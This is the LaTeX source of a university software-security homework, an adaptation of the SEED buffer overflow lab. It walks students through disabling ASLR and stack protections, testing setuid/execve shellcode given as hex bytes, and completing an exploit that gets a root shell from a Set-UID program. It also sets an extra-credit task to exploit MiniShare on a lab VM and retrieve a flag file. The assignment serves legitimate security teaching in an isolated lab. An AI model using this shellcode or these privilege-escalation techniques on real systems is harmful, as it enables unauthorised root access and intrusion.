\documentclass{article}

\usepackage{fancyhdr}
\usepackage{extramarks}
\usepackage{amsmath}
\usepackage{amsthm}
\usepackage{amsfonts}
\usepackage{tikz}
\usepackage[plain]{algorithm}
\usepackage{algpseudocode}
\usepackage{enumitem}
\usepackage{url}
\usepackage{listings}
\usepackage[T1]{fontenc}
\lstset{upquote=true}

\definecolor{mGreen}{rgb}{0,0.6,0}
\definecolor{mGray}{rgb}{0.5,0.5,0.5}
\definecolor{mPurple}{rgb}{0.58,0,0.82}
\definecolor{backgroundColour}{rgb}{0.95,0.95,0.92}

\lstdefinestyle{CStyle}{
    backgroundcolor=\color{backgroundColour},   
    commentstyle=\color{mGreen},
    keywordstyle=\color{magenta},
    numberstyle=\tiny\color{mGray},
    stringstyle=\color{mPurple},
    basicstyle=\footnotesize,
    breakatwhitespace=false,         
    breaklines=true,                 
    captionpos=b,                    
    keepspaces=true,                 
    numbers=left,                    
    numbersep=5pt,                  
    showspaces=false,                
    showstringspaces=false,
    showtabs=false,                  
    tabsize=2,
    language=C
}

\usetikzlibrary{automata,positioning}

%
% Basic Document Settings
%

\topmargin=-0.45in
\evensidemargin=0in
\oddsidemargin=0in
\textwidth=6.5in
\textheight=9.0in
\headsep=0.25in

\linespread{1.1}

\pagestyle{fancy}
\lhead{\hmwkAuthorName}
\chead{\hmwkClass\ : \hmwkTitle}
\rhead{\firstxmark}
\lfoot{\lastxmark}
\cfoot{\thepage}

\renewcommand\headrulewidth{0.4pt}
\renewcommand\footrulewidth{0.4pt}

\setlength\parindent{0pt}

%
% Create Problem Sections
%

\newcommand{\enterProblemHeader}[1]{
    \nobreak\extramarks{}{Problem \arabic{#1} continued on next page\ldots}\nobreak{}
    \nobreak\extramarks{Problem \arabic{#1} (continued)}{Problem \arabic{#1} continued on next page\ldots}\nobreak{}
}

\newcommand{\exitProblemHeader}[1]{
    \nobreak\extramarks{Problem \arabic{#1} (continued)}{Problem \arabic{#1} continued on next page\ldots}\nobreak{}
    \stepcounter{#1}
    \nobreak\extramarks{Problem \arabic{#1}}{}\nobreak{}
}

\setcounter{secnumdepth}{0}
\newcounter{partCounter}
\newcounter{homeworkProblemCounter}
\setcounter{homeworkProblemCounter}{1}
\nobreak\extramarks{Problem \arabic{homeworkProblemCounter}}{}\nobreak{}

%
% Homework Problem Environment
%
% This environment takes an optional argument. When given, it will adjust the
% problem counter. This is useful for when the problems given for your
% assignment aren't sequential. See the last 3 problems of this template for an
% example.
%
\newenvironment{homeworkProblem}[1][-1]{
    \ifnum#1>0
        \setcounter{homeworkProblemCounter}{#1}
    \fi
    \section{Problem \arabic{homeworkProblemCounter}}
    \setcounter{partCounter}{1}
    \enterProblemHeader{homeworkProblemCounter}
}{
    \exitProblemHeader{homeworkProblemCounter}
}

%
% Homework Details
%   - Title
%   - Due date
%   - Class
%   - Section/Time
%   - Instructor
%   - Author
%

\newcommand{\hmwkTitle}{Assignment\ \#2}
\newcommand{\hmwkDueDate}{September 7, 2018}
\newcommand{\hmwkClass}{SE 421}
\newcommand{\hmwkClassTime}{}
\newcommand{\hmwkClassInstructor}{Instructor: Ben Holland \\ \url{https://github.com/SE421/assignment2}}
\newcommand{\hmwkAuthorName}{Student Name: }

%
% Title Page
%

\title{
    \vspace{2in}
    \textmd{\textbf{\hmwkClass:\ \hmwkTitle}}\\
    \normalsize\vspace{0.1in}\small{Due\ on\ \hmwkDueDate\ at 12:00 PM (noon)}\\
    \vspace{0.1in}\large{\textit{\hmwkClassInstructor\ \hmwkClassTime}}
    \vspace{3in}
}

\author{\textbf{\hmwkAuthorName}}
\date{}

\renewcommand{\part}[1]{\textbf{\large Part \Alph{partCounter}}\stepcounter{partCounter}\\}

%
% Various Helper Commands
%

% Useful for algorithms
\newcommand{\alg}[1]{\textsc{\bfseries \footnotesize #1}}

% For derivatives
\newcommand{\deriv}[1]{\frac{\mathrm{d}}{\mathrm{d}x} (#1)}

% For partial derivatives
\newcommand{\pderiv}[2]{\frac{\partial}{\partial #1} (#2)}

% Integral dx
\newcommand{\dx}{\mathrm{d}x}

% Alias for the Solution section header
\newcommand{\solution}{\textbf{\large Solution}}

% Cartesian product
\newcommand{\Cross}{\mathbin{\tikz [x=1.4ex,y=1.4ex,line width=.2ex] \draw (0,0) -- (1,1) (0,1) -- (1,0);}}%

% Probability commands: Expectation, Variance, Covariance, Bias
\newcommand{\E}{\mathrm{E}}
\newcommand{\Var}{\mathrm{Var}}
\newcommand{\Cov}{\mathrm{Cov}}
\newcommand{\Bias}{\mathrm{Bias}}

\begin{document}

\maketitle

\newpage

\begin{homeworkProblem}
\textbf{(20 points)}

\begin{enumerate}[label=\Alph*.]
    \item (\textit{0 points}) Lab Setup \newline
    
    A buffer overflow is defined as the condition in which a program attempts to write data beyond the boundaries of pre-allocated fixed length buffers. This vulnerability can be used by a malicious user to alter the flow control of the program, leading to the execution of malicious code. This vulnerability arises due to the mixing of the storage for data (e.g. buffers) and the storage for controls (e.g. return addresses): an overflow in the data part can affect the control flow of the program, because an overflow can change the return address. In this problem we will be exploiting a buffer overflow vulnerability in a small program Ubuntu and other Linux distributions have implemented several security mechanisms to make the buffer-overflow attack difficult. To simplify our attacks, we need to disable them first. Later on, we will enable them one by one, and see whether our attack can still be successful. \newline
    
    To complete the lab setup take a screenshot (or screenshots) of the following steps to document in your report.
    
    \begin{enumerate}[label*=\arabic*.]
        \item First download the SEEDUbuntu16.04.zip file and start the contained virtual machine by following the setup instructions at \url{http://www.cis.syr.edu/~wedu/seed/lab_env.html}. The virtual machine credentials are: \texttt{seed}:\texttt{dees}.
        
        \item Ubuntu and several other Linux-based systems uses address space randomization \cite{ASLR} to randomize the starting address of heap and stack. This makes guessing the exact addresses difficult; guessing addresses is one of the critical steps of buffer-overflow attacks.
        
        \begin{verbatim}$ sudo sysctl -w kernel.randomize_va_space=0\end{verbatim}
        
        \item The GCC compiler implements a security mechanism called \texttt{StackGuard} to prevent buffer overflows. In the presence of this protection, buffer overflow attacks will not work. We can disable this protection during the compilation using the -fno-stack-protector option. For example, to compile a program example.c with StackGuard disabled, we can do the following:
        
        \begin{verbatim}$ gcc example.c -fno-stack-protector\end{verbatim}
        
        Ubuntu used to allow executable stacks, but this has now changed: the binary images of programs (and shared libraries) must declare whether they require executable stacks or not, i.e., they need to mark a field in the program header. Kernel or dynamic linker uses this marking to decide whether to make the stack of this running program executable or non-executable. This marking is done automatically by the recent versions of \texttt{gcc}, and by default, stacks are set to be non-executable (further reading: [3]). To change that, use the following options when compiling programs. \newline
        
        For executable stack:
        \begin{verbatim}$ gcc example.c -z execstack -o example\end{verbatim}
        
        For non-executable stack:
        \begin{verbatim}$ gcc example.c -z noexecstack -o example\end{verbatim}
        
        Our vulnerable program is \texttt{vulnerable.c} (\url{https://raw.githubusercontent.com/SE421/assignment2/master/vulnerable.c}). Compile \texttt{vulnerable.c} without stack protections (disable \texttt{StackGuard}) and with an executable stack. Name the compiled vulnerable executable program ``\texttt{vulnerable}''.
        
        \newpage
        \item In both Ubuntu 12.04 and Ubuntu 16.04 VMs, the \texttt{/bin/sh} symbolic link points to the \texttt{/bin/dash} shell. However, the dash program in these two VMs have an important difference. The dash shell in Ubuntu 16.04 has a countermeasure that prevents itself from being executed in a \texttt{Set-UID} process. Basically, if dash detects that it is executed in a \texttt{Set-UID} process, it immediately changes the effective user ID to the process's real user ID, essentially dropping the privilege. The dash program in Ubuntu 12.04 does not have this behavior. \newline
        
        Since our victim program is a \texttt{Set-UID} program, and our attack relies on running \texttt{/bin/sh}, the countermeasure in \texttt{/bin/dash} makes our attack more difficult. Therefore, we will link \texttt{/bin/sh} to another shell that does not have such a countermeasure (in later tasks, we will show that with a little bit more effort, the countermeasure in \texttt{/bin/dash} can be easily defeated). We have installed a shell program called \texttt{zsh} in our Ubuntu 16.04 VM. We use the following commands to link \texttt{/bin/sh} to \texttt{zsh} (there is no need to do these in Ubuntu 12.04):
        
        \begin{verbatim}$ sudo rm /bin/sh\end{verbatim}
        
        \begin{verbatim}$ sudo ln -s /bin/zsh /bin/sh\end{verbatim}
        
    \end{enumerate}
    
    \item (\textit{2 points}) Testing Shellcode \newline
    
    Before starting the attack, let us get familiar with the shellcode. A shellcode is the code to launch a shell. It has to be loaded into the memory so that we can force the vulnerable program to jump to it. Consider the following program:
    
\begin{lstlisting}[style=CStyle]
#include <stdio.h>
int main() {
   char *name[2];
   name[0] = "/bin/sh";
   name[1] = NULL;
   execve(name[0], name, NULL);
}
\end{lstlisting}

    The shellcode that we will use is just the assembly version of the above program. To test the shellcode download the \texttt{test\_shellcode.c} program (\url{https://raw.githubusercontent.com/SE421/assignment2/master/test_shellcode.c}), compile it, and run it to see if a shell is invoked. Note that you should compile the \texttt{test\_shellcode.c} program with the following command so that the stack is executable or else the program will fail.
    
    \begin{verbatim}$ gcc test_shellcode.c -z execstack -o test_shellcode\end{verbatim}
    
    Change the owner of the \texttt{test\_shellcode} program to root and set its permissions to 4755.
    
    \begin{verbatim}$ sudo chown root test_shellcode\end{verbatim}
        
    \begin{verbatim}$ sudo chmod 4755 test_shellcode\end{verbatim}
    
    The shellcode invokes the \texttt{execve()} system call to execute \texttt{/bin/sh}. A few places in this
    shellcode are worth mentioning. First, the third instruction pushes ``//sh'', rather than ``/sh'' into the stack.
    This is because we need a 32-bit number here, and ``/sh'' has only 24 bits. Fortunately, ``//'' is equivalent to
    ``/'', so we can get away with a double slash symbol. Second, before calling the \texttt{execve()} system call, we
    need to store \texttt{name[0]} (the address of the string), name (the address of the array), and \texttt{NULL} to the \texttt{\%ebx}, \texttt{\%ecx}, and \texttt{\%edx} registers, respectively. Line 5 stores name[0] to \texttt{\%ebx}; Line 8 stores name to \texttt{\%ecx}; Line 9 sets \texttt{\%edx} to zero. There are other ways to set \texttt{\%edx} to zero (e.g., \texttt{xorl \%edx, \%edx}); the one (\texttt{cdq}) used here is simply a shorter instruction: it copies the sign (bit 31) of the value in the \texttt{EAX} register (which is 0 at this point) into every bit position in the \texttt{EDX} register, basically setting \texttt{\%edx} to \texttt{0}. Third, the system call \texttt{execve()} is called when we set \texttt{\%al} to \texttt{11}, and execute ``\texttt{int \$0x80}''. \newline
    
    Include a screenshot of your working shellcode (you should get a root shell (\texttt{\#} prompt) by running \texttt{test\_shellcode}).

    \item (\textit{10 points}) Exploiting the Vulnerable Program \newline

    \begin{enumerate}[label*=\arabic*.]
        \item Change the owner of the vulnerable program to root and set its permissions to \texttt{4755}.
    
        \begin{verbatim}$ sudo chown root vulnerable\end{verbatim}
        
        \begin{verbatim}$ sudo chmod 4755 vulnerable\end{verbatim}
    
        Include a screenshot of the vulnerable program permissions by running:
        
        \begin{verbatim}$ ls -l\end{verbatim}
        
        \item The provided \texttt{vulnerable.c} program has a buffer overflow vulnerability. It first reads an input from a file called \texttt{badfile}, and then passes this input to another buffer in the function \texttt{bof()}. The original input can have a maximum length of \texttt{517} bytes, but the buffer in \texttt{bof()} is only \texttt{24} bytes long. Because \texttt{strcpy()} does not check boundaries, buffer overflow will occur. Since this program is a \texttt{Set-root-UID} program, if a normal user can exploit this buffer overflow vulnerability, the normal user might be able to get a root shell. It should be noted that the program gets its input from a file called \texttt{badfile}. This file is under user's control. Now, our objective is to create the contents for \texttt{badfile}, such that when the vulnerable program copies the contents into its buffer, a root shell can be spawned. \newline

        A partially completed C code to create the exploit file called \texttt{exploit.c} can be downloaded from \url{https://raw.githubusercontent.com/SE421/assignment2/master/exploit.c}. \newline
        
        After completing the commented TODOs, compile and run the \textit{exploit.c} program to created the \texttt{badfile}. Then run the \texttt{vulnerable} program, which reads from the \texttt{badfile}. If you are successful you should get a root shell (\texttt{\#} prompt).
        
        \begin{verbatim}$ gcc -o exploit exploit.c\end{verbatim}
        
        \begin{verbatim}$ ./exploit\end{verbatim}
        
        \begin{verbatim}$ ./vulnerable\end{verbatim}
        
        It should be noted that although you have obtained the ``\#'' prompt, your real user id is still yourself (the effective user id is now root). You can check this by running ``\texttt{id}'' in your root shell.
        \begin{verbatim}# id\end{verbatim}
        
        \textit{Hint:} If you compile a program with debug symbols (add \texttt{-g} option to \texttt{gcc}), you can set a breakpoint inside the \texttt{bof()} function (\texttt{gdb\$ break bof}), print the memory address of the start of the buffer (\texttt{gdb\$ print &buffer}), print the memory address of the \texttt{\$ebp} register (\texttt{gdb\$ print \$ebp}), and even compute the distance between the two hex values (\texttt{gdb\$ print (0x10 - 0x04)}). Using GDB you could learn the offset of where EIP is overwritten. Remember that 32 bit systems use 4 bytes to represent an address. \newline
        
        Include a link to your completed \texttt{exploit.c} source, a short explanation of how you completed the exploit, and a screenshot of your successful exploitation of the \texttt{vulnerable} program.
    \end{enumerate}

    \item (\textit{2 points}) Defeating \texttt{dash's} Countermeasure
    
    \begin{enumerate}[label*=\arabic*.]
        \item As we have explained before, the dash shell in Ubuntu 16.04 drops privileges when it detects that the effective UID does not equal to the real UID. This can be observed from dash program's changelog. We can see an additional check, which compares real and effective user/group IDs.
        
        \begin{verbatim}
// https://launchpadlibrarian.net/240241543/dash_0.5.8-2.1ubuntu2.diff.gz
// main() function in main.c has following changes:

++ uid = getuid();
++ gid = getgid();

++ /*
++  * To limit bogus system(3) or popen(3) calls in setuid binaries,
++  * require -p flag to work in this situation.
++  */
++ if (!pflag && (uid != geteuid() || gid != getegid())) {
++    setuid(uid);
++    setgid(gid);
++    /* PS1 might need to be changed accordingly. */
++    choose_ps1();
++ }
\end{verbatim}

    The countermeasure implemented in \texttt{dash} can be defeated. One approach is not to invoke \texttt{/bin/sh} in
    our shellcode; instead, we can invoke another shell program. This approach requires another shell program,
    such as \texttt{zsh} to be present in the system. Another approach is to change the real user ID of the victim process to zero before invoking the dash program. We can achieve this by invoking \texttt{setuid(0)} before executing \texttt{execve()} in the shellcode. In this task, we will use this approach. We will first change the \texttt{/bin/sh} symbolic link, so it points back to \texttt{/bin/dash}:
    
    \begin{verbatim}$ sudo rm /bin/sh\end{verbatim}
    
    \begin{verbatim}$ sudo ln -s /bin/dash /bin/sh\end{verbatim}
    
    \item  To see how the countermeasure in dash works and how to defeat it using the system call \texttt{setuid(0)}, we write the following C program. We first comment out line 11 and run the program as a \texttt{Set-UID} program (the owner should be root); please describe your observations. We then uncomment Line 11 and run the program again.
        
        \begin{lstlisting}[style=CStyle]
// dash_shell_test.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
   char *argv[2];
   argv[0] = "/bin/sh";
   argv[1] = NULL;

   // setuid(0);
   execve("/bin/sh", argv, NULL);

   return 0;
}
\end{lstlisting}

    The \texttt{dash\_shell\_test.c} program can be compiled and set up using the following commands (remember that we need to make it root-owned \texttt{Set-UID} program).
        
    \begin{verbatim}$ gcc dash_shell_test.c -o dash_shell_test\end{verbatim}
        
    \begin{verbatim}$ sudo chown root dash_shell_test\end{verbatim}
        
    \begin{verbatim}$ sudo chmod 4755 dash_shell_test\end{verbatim}
    
    \begin{verbatim}$ ./dash_shell_test\end{verbatim}
        
    Describe your observations and include any necessary screenshots.
        
    \end{enumerate}

\item From our previous experiment, we will see that \texttt{setuid(0)} makes a difference. Let us add the assembly
code for invoking this system call at the beginning of our shellcode, before we invoke \texttt{execve()}. The updated shellcode adds 4 instructions: (1) set \texttt{ebx} to zero in Line 2, (2) set \texttt{eax} to \texttt{0xd5} via Line 1 and 3 (\texttt{0xd5} is \texttt{setuid()'s} system call number), and (3) execute the system call in Line 4. Using this shellcode, we can attempt the attack on the vulnerable program when \texttt{/bin/sh} is linked to \texttt{/bin/dash}. 

\begin{verbatim}
char shellcode[] =
  "\x31\xc0" /* Line 1: xorl %eax,%eax */
  "\x31\xdb" /* Line 2: xorl %ebx,%ebx */
  "\xb0\xd5" /* Line 3: movb $0xd5,%al */
  "\xcd\x80" /* Line 4: int $0x80 */
  // ---- the shellcode below is the same as the previous exploit shellcode ---
  "\x31\xc0"
  "\x50"
  "\x68""//sh"
  "\x68""/bin"
  "\x89\xe3"
  "\x50"
  "\x53"
  "\x89\xe1"
  "\x99"
  "\xb0\x0b"
  "\xcd\x80"
\end{verbatim}

Using the modified shellcode above in \texttt{exploit.c}, try the attack again and see if you can get a root shell. Please describe and explain your results.

\item (\textit{2 points}) Defeating Address Randomization

\begin{enumerate}[label*=\arabic*.]
    \item On 32-bit Linux machines, stacks only have 19 bits of entropy, which means the stack base address can have $2^19 = 524,288$ possibilities. This number is not that high and can be exhausted easily with the brute-force approach. In this task, we use such an approach to defeat the address randomization countermeasure on our 32-bit VM. First, we turn on the Ubuntu's address randomization using the following command. 
    
    \begin{verbatim}$ sudo /sbin/sysctl -w kernel.randomize_va_space=2\end{verbatim}
    
    Rerun your exploit. Please describe and explain your observation.
    
    \newpage
    \item We then use the brute-force approach to attack the vulnerable program repeatedly, hoping that the address we put in the badfile can eventually be correct. You can use the following shell script to run the vulnerable program in an infinite loop. If your attack succeeds, the script will stop; otherwise, it will keep running. Please be patient, as this may take a while. Let it run overnight if needed. Please describe your observations.
    
    \begin{verbatim}
#!/bin/bash

SECONDS=0
value=0

while [ 1 ]
   do
   value=$(( $value + 1 ))
   duration=$SECONDS
   min=$(($duration / 60))
   sec=$(($duration % 60))
   echo "$min minutes and $sec seconds elapsed."
   echo "The program has been running $value times so far."
  ./vulnerable
done
\end{verbatim}

\end{enumerate}

\item (\textit{2 points}) Investigate \texttt{StackGuard} Protection

Before working on this task, remember to turn off the address randomization first and non-executable stack protections, or you will not know which protection helps achieve the protection.

In GCC version 4.3.3 and above, \texttt{StackGuard} is enabled by default. Therefore, you have to disable
\texttt{StackGuard} using the switch mentioned before. In earlier versions, it was disabled by default. If you use a
older GCC version, you may not have to disable \texttt{StackGuard}.

\begin{verbatim}$ gcc vulnerable.c -o vulnerable -z execstack\end{verbatim}

For this task, you will recompile the vulnerable program, to use GCC StackGuard, execute the exploit again, and report
your observations. You may report any error messages you observe.

\item (\textit{2 points}) Investigate Non-executable Stack Protection

Before working on this task, remember to turn off the address randomization first and \texttt{StackGuard} protections, or you will not know which protection helps achieve the protection.

\begin{verbatim}$ gcc vulnerable.c -o vulnerable -fno-stack-protector -z noexecstack\end{verbatim}

For this task, you will recompile the vulnerable program, to use non-excutable statck protections, execute the exploit again, and report your observations. You may report any error messages you observe. Answer the follow up question: How does the \texttt{return-to-libc} (return oriented programming) technique bypass this protection?

\end{enumerate}
\end{homeworkProblem}

\newpage

\begin{homeworkProblem}
\textbf{(Extra Credit) 10 points} \newline

Your goal is to gain access to the given victim virtual machine and exfiltrate the contents of a file named ``flag.txt'' that is located on the administrator user's desktop folder. Submit the contents of the flag.txt file as your solution along with a walkthrough (including screenshots) of how you successfully retrieved the flag. If you are unable to recover the flag.txt file contents, partial credit will be given for documenting your efforts up until the point you got stuck. \newline

\textbf{Victim VM:} \url{http://www.benjaminsbox.com/pac/WinXPSP3Victim.ova} \newline

Notes and Hints:
\begin{itemize}
 \item The virtual machine was created and tested with VMware. You can download VMware Player for free for Windows/Linux at \url{https://www.vmware.com/go/tryplayer}. The free player only editions do not have snapshot abilities or VM creation abilities, however VMware offers ISU students free professional editions of VMWare Workstation (Windows/Linux) and VMWare Fusion (mac) at \url{https://cytools.iastate.edu/vmap}.
 \item After installing VMware Player or VMware Workstation or VMware Fusion, ``import'' the WinXPSP3Victim.ova file included with this assignment into VMware.
 \item You do not have the password to log into the virtual machine, so you will be unable to debug your exploit code. It may be helpful to mimic the target environment. The target virtual machine was constructed using the Windows XP SP3 ISO available at: (\url{http://www.benjaminsbox.com/pac/en_windows_xp_professional_with_service_pack_3_x86.iso}). When creating the virtual machine you do not need a license key (just run it in the 30 day evaluation mode). VMware Workstation and VMware Fusion both can be used to create a new VM.
 \item The Windows VM runs the MiniShare webserver as a \textit{startup task} (see \url{https://support.microsoft.com/en-us/help/308569/how-to-schedule-tasks-in-windows-xp}). If you need to restart the MiniShare webserver then will need to reboot the virtual machine.
 \item The virtual machine is running the MiniShare 1.4.1 binary as Administrator.
 \item The virtual machine is configured to accept IP addresses via DHCP and was placed on a Host Only network (meaning only your host machine or another VM on your host can reach the Victim machine). From your host machine or attacker VM you should first confirm that you can reach the MiniShare web server with a web browser by navigating to \url{http://<VICTIM_IP>}. To find the victim IP address type ``arp -a'' in your \textit{host machine} (machine running hosting the virtual machine) command line. Cross reference this IP list with the MAC address assigned by the VMware network adapter (shown under the VM network settings menu). As a last resort, if you are still having network connectivity issues, a TA can log into the VM for you to check network adapter settings.
 \item There are walkthroughs for exploiting MiniShare online as well as in the class lecture notes.
 \item Some commands in the tools provided by recent Kali Linux releases have changed slightly from when the class lecture notes were made. Note that there are premade releases of Kali virtual machines at: \url{https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-hyperv-image-download}. 
 \item Use Google or come to the office hours if you get stuck.
\end{itemize}

\end{homeworkProblem}

\pagebreak

\textit{Notice: } Problem 1 of this assignment was adapted from the Syracuse SEED Buffer Overflow Vulnerability Lab developed under National Science Foundation under Award No. 1303306 and 1318814. The lab in its original form is available at \url{http://www.cis.syr.edu/~wedu/seed/Labs_16.04/Software/Buffer_Overflow}. By extension problem 1 of this assignment is licensed under a Creative Commons Attribution-NonCommercialShareAlike 4.0 International License. You are free to copy and redistribute the material in any medium or format. You must give appropriate credit. If you remix, transform, or build upon the material, you must distribute your contributions under the same license as the original. You may not use the material for commercial purposes. You should temporarily disable ASLR with the command 

% references section
\bibliographystyle{IEEEtran}
\bibliography{references}

\end{document}
